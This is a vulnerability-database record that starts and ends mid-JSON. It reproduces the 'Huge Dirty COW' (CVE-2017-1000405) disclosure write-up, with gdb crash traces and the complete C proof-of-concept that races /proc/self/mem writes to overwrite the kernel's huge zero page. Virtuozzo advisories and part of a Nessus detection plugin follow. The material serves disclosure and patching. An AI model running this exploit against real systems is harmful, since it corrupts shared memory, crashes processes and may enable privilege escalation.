`follow_page_mask`, which will be called each time `get_user_pages` tries to get a huge page. Obviously, the comment is incorrect and nowadays the dirty bit is NOT meaningless. In particular\u200a\u2014\u200awhen using `get_user_pages` to read a huge page, that page will be marked dirty without going through a COW cycle, and `can_follow_write_pmd`\u2019s logic is now broken.\r\n\r\nAt this point, exploiting the bug is straightforward\u200a\u2014\u200awe can use a similar pattern of the original Dirty COW race. This time, after we get rid of the copied version of the page, we have to fault the original page twice\u200a\u2014\u200afirst to make it present, and then to turn on the dirty bit.\r\n\r\nNow comes the inevitable question\u200a\u2014\u200ahow bad is this?\r\n\r\n### Bug implications\r\nIn order to exploit the bug, we have to choose an interesting read-only huge page as a target for the writing. 
The only constraint is that we need to be able to fetch it after it\u2019s discarded with `madvise(MADV_DONTNEED)`.\r\nAnonymous huge pages that were inherited from a parent process after a `fork` are a valuable target, however once they are discarded they are lost for good\u200a\u2014\u200awe can\u2019t fetch them again.\r\n\r\nWe found two interesting targets that should not be written into:\r\n* The huge zero page\r\n* Sealed (read-only) huge pages\r\n\r\n### The zero page\r\nWhen issuing a read fault on an anonymous mapping before it was ever written, we get a special physical page called the zero page. This optimization prevents the system from having to allocate multiple zeroed out pages in the system, which might never be written to. Thus, the exact same zero page is mapped in many different processes, which have different security levels.\r\n\r\nThe same principle applies to huge pages as well\u200a\u2014\u200athere\u2019s no need to create another huge page if no write fault has occurred yet\u200a\u2014\u200aa special page called the huge zero page will be mapped, instead. Note that this feature can be turned off as well.\r\n\r\n### THP, shmem and sealed files\r\nshmem and [tmpfs](https://medium.com/r/?url=https%3A%2F%2Fwww.kernel.org%2Fdoc%2FDocumentation%2Ffilesystems%2Ftmpfs.txt) files can be mapped using THP as well. shmem files can be created using the [memfd_create](https://medium.com/r/?url=http%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman2%2Fmemfd_create.2.html) syscall, or by mmaping anonymous shared mappings. tmpfs files can be created using the mount point of the tmpfs (usually `/dev/shm`). Both can be mapped with huge pages, depending on the system configuration.\r\n\r\nshmem files can be sealed\u200a\u2014\u200asealing a file restricts the set of operations allowed on the file in question. 
This mechanism allows processes that don\u2019t trust each other to communicate via shared memory without having to take extra measures to deal with unexpected manipulations of the shared memory region (see `man memfd_create()` for more info). Three types of seals exist -\r\n* `F_SEAL_SHRINK`: file size cannot be reduced\r\n* `F_SEAL_GROW`: file size cannot be increased\r\n* `F_SEAL_WRITE`: file content cannot be modified\r\n\r\nThese seals can be added to the shmem file using the `fcntl` syscall.\r\n\r\n### POC\r\nOur POC demonstrates overwriting the huge zero page. Overwriting shmem should be equally possible and would lead to an alternative exploit path.\r\n\r\nNote that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) THP. Using this primitive, we successfully crash several processes. A likely consequence of overwriting the huge zero page is having improper initial values inside large BSS sections. A common vulnerable pattern would be using the zero value as an indicator that a global variable hasn\u2019t been initialized yet.\r\n\r\nThe following crash example demonstrates that pattern. In this example, the JS Helper thread of Firefox makes a `NULL`-deref, probably because the boolean pointed by `%rdx` erroneously says the object was initialized:\r\n```\r\nThread 10 \"JS Helper\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7fffe2aee700 (LWP 14775)]\r\n0x00007ffff13233d3 in ?? 
() from /opt/firefox/libxul.so\r\n(gdb) i r\r\nrax 0x7fffba7ef080 140736322269312\r\nrbx 0x0 0\r\nrcx 0x22 34\r\nrdx 0x7fffba7ef080 140736322269312\r\nrsi 0x400000000 17179869184\r\nrdi 0x7fffe2aede10 140736996498960\r\nrbp 0x0 0x0\r\nrsp 0x7fffe2aede10 0x7fffe2aede10\r\nr8 0x20000 131072\r\nr9 0x7fffba900000 140736323387392\r\nr10 0x7fffba700000 140736321290240\r\nr11 0x7fffe2aede50 140736996499024\r\nr12 0x1 1\r\nr13 0x7fffba7ef090 140736322269328\r\nr14 0x2 2\r\nr15 0x7fffe2aee700 140736996501248\r\nrip 0x7ffff13233d3 0x7ffff13233d3\r\neflags 0x10246 [ PF ZF IF RF ]\r\ncs 0x33 51\r\nss 0x2b 43\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/10i $pc-0x10\r\n 0x7ffff13233c3: mov %rax,0x10(%rsp)\r\n 0x7ffff13233c8: mov 0x8(%rdx),%rbx\r\n 0x7ffff13233cc: mov %rbx,%rbp\r\n 0x7ffff13233cf: and $0xfffffffffffffffe,%rbp\r\n=> 0x7ffff13233d3: mov 0x0(%rbp),%eax\r\n 0x7ffff13233d6: and $0x28,%eax\r\n 0x7ffff13233d9: cmp $0x28,%eax\r\n 0x7ffff13233dc: je 0x7ffff1323440\r\n 0x7ffff13233de: mov %rbx,%r13\r\n 0x7ffff13233e1: and $0xfffffffffff00000,%r13\r\n(gdb) x/10w $rdx\r\n0x7fffba7ef080: 0x41414141 0x00000000 0x00000000 0x00000000\r\n0x7fffba7ef090: 0xeef93bba 0x00000000 0xda95dd80 0x00007fff\r\n0x7fffba7ef0a0: 0x778513f1 0x00000000\r\n```\r\n\r\nThis is another crash example\u200a\u2014\u200agdb crashes while loading the symbols for a Firefox debugging session:\r\n```\r\n(gdb) r\r\nStarting program: /opt/firefox/firefox \r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n(gdb) i s\r\n#0 0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n#1 0x0000555555955203 in htab_find_slot_with_hash (htab=0x555557008e60, 
element=element@entry=0x7fffffffdb00, hash=4181413748, insert=insert@entry=INSERT) at ./hashtab.c:659\r\n#2 0x0000555555955386 in htab_find_slot (htab=<optimized out>, element=element@entry=0x7fffffffdb00, insert=insert@entry=INSERT) at ./hashtab.c:703\r\n#3 0x00005555558273e5 in symbol_set_names (gsymbol=gsymbol@entry=0x5555595b3778, linkage_name=linkage_name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", len=len@entry=48, \r\n copy_name=copy_name@entry=0, objfile=<optimized out>) at symtab.c:818\r\n#4 0x00005555557d186f in minimal_symbol_reader::record_full (this=0x7fffffffdce0, this@entry=0x1768bd6, name=<optimized out>, \r\n name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=48, address=24546262, ms_type=ms_type@entry=mst_file_text, \r\n section=13) at minsyms.c:1010\r\n#5 0x00005555556959ec in record_minimal_symbol (reader=..., name=name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=false, \r\n address=<optimized out>, address@entry=24546262, ms_type=ms_type@entry=mst_file_text, bfd_section=<optimized out>, objfile=0x555557077860) at elfread.c:209\r\n#6 0x0000555555696ac6 in elf_symtab_read (reader=..., objfile=objfile@entry=0x555557077860, type=type@entry=0, number_of_symbols=number_of_symbols@entry=365691, \r\n symbol_table=symbol_table@entry=0x7ffff6a6d020, copy_names=copy_names@entry=false) at elfread.c:462\r\n#7 0x00005555556970c4 in elf_read_minimal_symbols (symfile_flags=<optimized out>, ei=0x7fffffffdcd0, objfile=0x555557077860) at elfread.c:1084\r\n#8 elf_symfile_read (objfile=0x555557077860, symfile_flags=...) at elfread.c:1194\r\n#9 0x000055555581f559 in read_symbols (objfile=objfile@entry=0x555557077860, add_flags=...) 
at symfile.c:861\r\n#10 0x000055555581f00b in syms_from_objfile_1 (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1062\r\n#11 syms_from_objfile (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1078\r\n#12 symbol_file_add_with_addrs (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., parent=parent@entry=0x0)\r\n at symfile.c:1177\r\n#13 0x000055555581f63d in symbol_file_add_from_bfd (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., \r\n parent=parent@entry=0x0) at symfile.c:1268\r\n#14 0x000055555580b256 in solib_read_symbols (so=so@entry=0x55555738bfc0, flags=...) at solib.c:712\r\n#15 0x000055555580be9b in solib_add (pattern=pattern@entry=0x0, from_tty=from_tty@entry=0, readsyms=1) at solib.c:1016\r\n#16 0x000055555580c678 in handle_solib_event () at solib.c:1301\r\n#17 0x00005555556f9db4 in bpstat_stop_status (aspace=0x555555ff5670, bp_addr=bp_addr@entry=140737351961185, ptid=..., ws=ws@entry=0x7fffffffe1d0) at breakpoint.c:5712\r\n#18 0x00005555557ad1ef in handle_signal_stop (ecs=0x7fffffffe1b0) at infrun.c:5963\r\n#19 0x00005555557aec8a in handle_inferior_event_1 (ecs=0x7fffffffe1b0) at infrun.c:5392\r\n#20 handle_inferior_event (ecs=ecs@entry=0x7fffffffe1b0) at infrun.c:5427\r\n#21 0x00005555557afd57 in fetch_inferior_event (client_data=<optimized out>) at infrun.c:3932\r\n#22 0x000055555576ade5 in gdb_wait_for_event (block=block@entry=0) at event-loop.c:859\r\n#23 0x000055555576aef7 in gdb_do_one_event () at event-loop.c:322\r\n#24 0x000055555576b095 in gdb_do_one_event () at ./common/common-exceptions.h:221\r\n#25 start_event_loop () at event-loop.c:371\r\n#26 0x00005555557c3938 in captured_command_loop (data=data@entry=0x0) at main.c:325\r\n#27 0x000055555576d243 in catch_errors (func=func@entry=0x5555557c3910 
<captured_command_loop(void*)>, func_args=func_args@entry=0x0, errstring=errstring@entry=0x555555a035da \"\", \r\n mask=mask@entry=RETURN_MASK_ALL) at exceptions.c:236\r\n#28 0x00005555557c49ae in captured_main (data=<optimized out>) at main.c:1150\r\n#29 gdb_main (args=<optimized out>) at main.c:1160\r\n#30 0x00005555555ed628 in main (argc=<optimized out>, argv=<optimized out>) at gdb.c:32\r\n(gdb) list\r\n692 const struct demangled_name_entry *da\r\n693 = (const struct demangled_name_entry *) a;\r\n694 const struct demangled_name_entry *db\r\n695 = (const struct demangled_name_entry *) b;\r\n696 \r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n698 }\r\n699 \r\n700 /* Create the hash table used for demangled names. Each hash entry is\r\n701 a pair of strings; one for the mangled name and one for the demangled\r\n(gdb)\r\n```\r\n\r\nLink to our [POC](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Fbindecy%2FHugeDirtyCowPOC)\r\n\r\n### Summary\r\nThis bug demonstrates the importance of patch auditing in the security development life-cycle. As the Dirty COW case and other [past cases](https://medium.com/r/?url=https%3A%2F%2Fsektioneins.de%2Fblog%2F16-09-05-pegasus-ios-kernel-vulnerability-explained-part-2.html) show, even hyped vulnerabilities may get incomplete patches. The situation is not reserved for closed source software only; open source software suffers just as much.\r\n\r\nFeel free to comment with any question or idea about the issue \r\n\r\n### Disclosure timeline\r\nThe initial report was on the 22.11.17 to the kernel and distros mailing lists. The response was immediate and professional with a [patch](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Ftorvalds%2Flinux%2Fcommit%2Fa8f97366452ed491d13cf1e44241bc0b5740b1f0) ready in a few days. 
The patch fixes the touch_pmd function to set the dirty bit of the PMD entry only when the caller asks for write access.\r\n\r\nThanks to the Security team and the distros for their time and effort of maintaining a high standard of security.\r\n\r\n* 22.11.17\u200a\u2014\u200aInitial report to security@kernel.org and linux-distros@vs.openwall.org\r\n* 22.11.17\u200a\u2014\u200aCVE-2017\u20131000405 was assigned\r\n* 27.11.17\u200a\u2014\u200aPatch was committed to mainline kernel\r\n* 29.11.17\u200a\u2014\u200aPublic announcement", "published": "2017-11-30T00:00:00", "type": "seebug", "title": "\"Huge Dirty COW\" (CVE-2017\u20131000405)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2017-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96908", "id": "SSV:96908", "sourceData": "\n //\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n 
lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] 
Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] 
Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96908", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:27:45", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-693.1.1.vz7.37.30 (Virtuozzo 7.0.6).\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n**Vulnerability id:** CVE-2017-1000407\nA vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. 
A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-111", "href": "https://help.virtuozzo.com/customer/portal/articles/2909951", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.1 for Virtuozzo 7.0.6", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:06", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n**Vulnerability id:** CVE-2017-1000407\nA vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. 
A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-110", "href": "https://help.virtuozzo.com/customer/portal/articles/2909950", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.1 for Virtuozzo 7.0.5", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:09", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4) and 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3)\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). 
An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-109", "href": "https://help.virtuozzo.com/customer/portal/articles/2909949", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.2 for Virtuozzo 7.0.4 and 7.0.4 HF3", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:19", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15129", "CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-18017", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.42.0.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.42.0.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2017-8824\nA vulnerability was found in DCCP socket handling code. dccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-15129\nThe function get_net_ns_by_id() does not check the net.count value when processing a peer network, which could lead to double free and memory corruption. 
An unprivileged local user could use this vulnerability to crash the system.\n\n**Vulnerability id:** CVE-2017-18017\nIf the system uses iptables and there are iptables rules with TCPMSS action there, a remote attacker could cause a denial of service (use-after-free in tcpmss_mangle_packet function leading to memory corruption) or possibly have unspecified other impact by sending specially crafted network packets.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, could exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n", "edition": 1, "modified": "2018-01-12T00:00:00", "published": "2018-01-12T00:00:00", "id": "VZA-2018-004", "href": "https://help.virtuozzo.com/customer/portal/articles/2915392", "title": "Important kernel security update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 42.0 for Virtuozzo 7.0.0, 7.0.1, and 7.0.3", "type": "virtuozzo", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:13:20", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). 
An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-111)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "modified": "2017-12-12T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-111.NASL", "href": "https://www.tenable.com/plugins/nessus/105167", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105167);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-111)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and 
the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909951\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?25634872\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n 
